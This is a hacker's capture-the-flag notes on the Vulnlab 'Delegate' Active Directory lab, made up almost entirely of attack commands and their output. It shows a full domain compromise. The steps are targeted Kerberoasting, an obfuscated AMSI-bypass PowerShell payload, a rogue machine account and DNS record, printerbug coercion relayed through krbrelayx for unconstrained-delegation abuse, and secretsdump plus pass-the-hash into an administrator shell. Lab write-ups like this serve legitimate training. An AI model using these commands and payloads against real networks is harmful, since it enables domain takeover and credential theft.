Here is my note on DELEGATE box from Vulnlab.
DELEGATE: 10.10.123.175
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
bloodhound-python -c All -u A.Briggs -p 'P4ssw0rd1#123' -d delegate.vl --dns-tcp -ns 10.10.123.175
A.Briggs -> GenericWrite -> N.THOMPSON -> CanPSRemote -> DC1.DELEGATE.VL
targetedKerberoast.py NOTES: Bloodhound User1 -> GenericWrite -> USER2
https://github.com/ShutdownRepo/targetedKerberoast
python3 targetedKerberoast.py -v -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123'
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast]
└─# python3 targetedKerberoast.py -v -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$d433a16a0d864d7d4b4fa13eeca96[SNIP].
N.Thompson:KALEB_2341
Troubleshooting:
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
sudo rdate -n 10.10.123.175
ShadowCredentials Attack:
pywhisker.py -d "delegate.vl" -u "A.Briggs" -p 'P4ssw0rd1#123' --target "N.THOMPSON" --action "add"
[*] Searching for the target account
[*] Target user found: CN=N.Thompson,CN=Users,DC=delegate,DC=vl
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: e8b538dc-5c48-7fde-5921-7353c768553a
[*] Updating the msDS-KeyCredentialLink attribute of N.THOMPSON
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: dXlDJQiR.pfx
[*] Must be used with password: bI3A0fi43zF281ELeFib
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
#PKINIT DISABLE.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-26 20:25:32Z)
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# sudo impacket-GetNPUsers -no-pass -dc-ip 10.10.123.175 -usersfile usernames delegate.vl/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
-NO-ASREPROASTING.
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# sudo impacket-GetUserSPNs 'delegate.vl/A.Briggs:P4ssw0rd1#123' -dc-ip 10.10.123.175 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
No entries found!
-NO-KERBEROASTING.
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# sudo impacket-rpcdump @10.10.123.175 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# rpcclient --user="" --command=enumdomusers -N 10.10.123.175
result was NT_STATUS_ACCESS_DENIED
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# crackmapexec smb 10.10.123.175 -u guest -p ""
SMB 10.10.123.175 445 DC1 [*] Windows 10.0 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.123.175 445 DC1 [+] delegate.vl\guest:
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# crackmapexec smb 10.10.123.175 -u guest -p "" --shares
SMB 10.10.123.175 445 DC1 [*] Windows 10.0 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.123.175 445 DC1 [+] delegate.vl\guest:
SMB 10.10.123.175 445 DC1 [+] Enumerated shares
SMB 10.10.123.175 445 DC1 Share Permissions Remark
SMB 10.10.123.175 445 DC1 ----- ----------- ------
SMB 10.10.123.175 445 DC1 ADMIN$ Remote Admin
SMB 10.10.123.175 445 DC1 C$ Default share
SMB 10.10.123.175 445 DC1 IPC$ READ Remote IPC
SMB 10.10.123.175 445 DC1 NETLOGON READ Logon server share
SMB 10.10.123.175 445 DC1 SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# smbclient \\\\10.10.123.175\\IPC$ -U "guest"
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
sudo lookupsid.py Guest@10.10.123.175 | tee usernames
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# cat usernames | grep SidTypeUser |gawk -F '\' '{ print $2 }' |gawk -F ' ' '{ print $1 }' |tee usernames
Administrator
Guest
krbtgt
DC1$
A.Briggs
b.Brown
R.Cooper
J.Roberts
N.Thompson
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# sudo impacket-GetNPUsers -no-pass -dc-ip 10.10.123.175 -usersfile usernames delegate.vl/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
-NO-ASREPROASTING.
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# sudo impacket-GetUserSPNs 'delegate.vl/A.Briggs:P4ssw0rd1#123' -dc-ip 10.10.123.175 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
No entries found!
-NO-KERBEROASTING.
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# smbclient \\\\10.10.123.175\\NETLOGON -U "guest"
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023
5242879 blocks of size 4096. 1898179 blocks available
smb: \> exit
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# smbclient \\\\10.10.123.175\\NETLOGON -U "guest"
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023
5242879 blocks of size 4096. 1917833 blocks available
smb: \> get users.bat
getting file \users.bat of size 159 as users.bat (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# smbclient \\\\10.10.123.175\\SYSVOL -U "guest"
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Sep 9 09:52:30 2023
.. D 0 Sat Aug 26 05:39:25 2023
delegate.vl Dr 0 Sat Aug 26 05:39:25 2023
-Nothing interested other than users.bat which is same as from netlogon.
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# crackmapexec smb 10.10.123.175 -u usernames -p "P4ssw0rd1#123" --continue-on-success
SMB 10.10.123.175 445 DC1 [*] Windows 10.0 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.123.175 445 DC1 [-] delegate.vl\Administrator:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\Guest:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\krbtgt:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\DC1$:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [+] delegate.vl\A.Briggs:P4ssw0rd1#123
SMB 10.10.123.175 445 DC1 [-] delegate.vl\b.Brown:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\R.Cooper:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\J.Roberts:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\N.Thompson:P4ssw0rd1#123 STATUS_LOGON_FAILURE
A.Briggs:P4ssw0rd1#123
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2023-09-30T15:47:02
|_Not valid after: 2024-03-31T15:47:02
| rdp-ntlm-info:
| Target_Name: DELEGATE
| NetBIOS_Domain_Name: DELEGATE
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: delegate.vl
| DNS_Computer_Name: DC1.delegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-01-26T20:25:40+00:00
|_ssl-date: 2024-01-26T20:26:19+00:00; -1s from scanner time.
5985/tcp open wsman
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# crackmapexec winrm 10.10.123.175 -u N.THOMPSON -p "KALEB_2341"
SMB 10.10.123.175 5985 DC1 [*] Windows 10.0 Build 20348 (name:DC1) (domain:delegate.vl)
HTTP 10.10.123.175 5985 DC1 [*] http://10.10.123.175:5985/wsman
WINRM 10.10.123.175 5985 DC1 [+] delegate.vl\N.THOMPSON:KALEB_2341 (Pwn3d!)
┌──(root㉿kali)-[/home/kali/BOXES/COMP/DELEGATE]
└─# evil-winrm -i 10.10.123.175 -u N.THOMPSON -p 'KALEB_2341'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami
delegate\n.thompson
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>
-USER-SHELL !
*Evil-WinRM* PS C:\Users\N.Thompson\Desktop> dir
Directory: C:\Users\N.Thompson\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/2/2023 12:53 PM 36 user.txt
*Evil-WinRM* PS C:\Users\N.Thompson\Desktop> type user.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\Users\N.Thompson\Desktop>
FLAG.TXT: VL{REDIRECTED}
PRIV ESC:
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
#WORKS !
*Evil-WinRM* PS C:\Users\N.Thompson> net group "delegation admins" │
Group name delegation admins │
Comment Group to allow delegation in the domain │
│
Members │
│
------------------------------------------------------------------------------- │
J.Roberts N.Thompson │
The command completed successfully.
-No-Print-Nightmare
Get-DomainUser -AllowDelegation -AdminCount
-N.Thompson
Set-ADAccountPassword J.ROBERTS -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'Password123!') -Verbose
Unconstrained Delegation With SeEnableDelegationPrivilege:
1. The user belongs to a group named "delegatation admins" which is a "Group to allow delegation in the domain".
2. Also the user has the SeEnableDelegationPrivilege.
Powermad.ps1: Target (Windows)
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
LINUX: HOST (KALI)
➜ krbrelayx git:(master) ✗ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.0.71 --action add DC1.delegate.vl -dns-ip 10.10.88.246
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
#As the ticket will be encrypted with keytype 23 (rc4_hmac), we need to calculate the NTLM hash for the password ‘12345’, which will be:
7A21990FCD3D759941E45C490F143D5F
https://codebeautify.org/ntlm-hash-generator
python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
➜ krbrelayx git:(master) ✗ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
#PASS:12345
#And as we can see we just got a ticket for DC1$, so we can just use secretsdump and get the admin hash:
export KRB5CCNAME=/home/kali/Kali-Tools/krbrelayx/'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'
export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
secretsdump.py -k DC1.delegate.vl -just-dc-ntlm
secretsdump.py -k DC1.delegate.vl -just-dc-user Administrator
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f877adcb278c4e178c430440573528db38631785a0afe9281d0dbdd10774848c
Administrator:aes128-cts-hmac-sha1-96:3a25aca9a80dfe5f03cd03ea2dcccafe
Administrator:des-cbc-md5:ce257f16ec25e59e
[*] Cleaning up...
MachineAccountQuota is USEFUL Sometimes: Exploiting One of Active Directory's Oddest Settings
https://github.com/Kevin-Robertson/Powermad
https://medium.com/m/global-identity-2?redirectUrl=https%3A%2F%2Fsystemweakness.com%2Fvulnlab-delegate-9b1272cd4a98
https://pr0m0ly.github.io/docs/VulnLab/Delegate/
https://medium.com/@arz101/vulnlab-delegate-dde0a396f504
┌──(root㉿kali)-[/home/kali/Kali-Tools/krbrelayx]
└─# evil-winrm -i 10.10.88.246 -u Administrator -H 'c32198ceab4cc695e65045562aa3ee93'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
delegate\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
ADMINISTRATOR SHELL !
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/2/2023 12:52 PM 36 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
FLAG.TXT: VL{REDIRECTED}
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49672/tcp open unknown
49673/tcp open unknown
49683/tcp open unknown
49688/tcp open unknown
49692/tcp open unknown
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-26T20:25:40
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required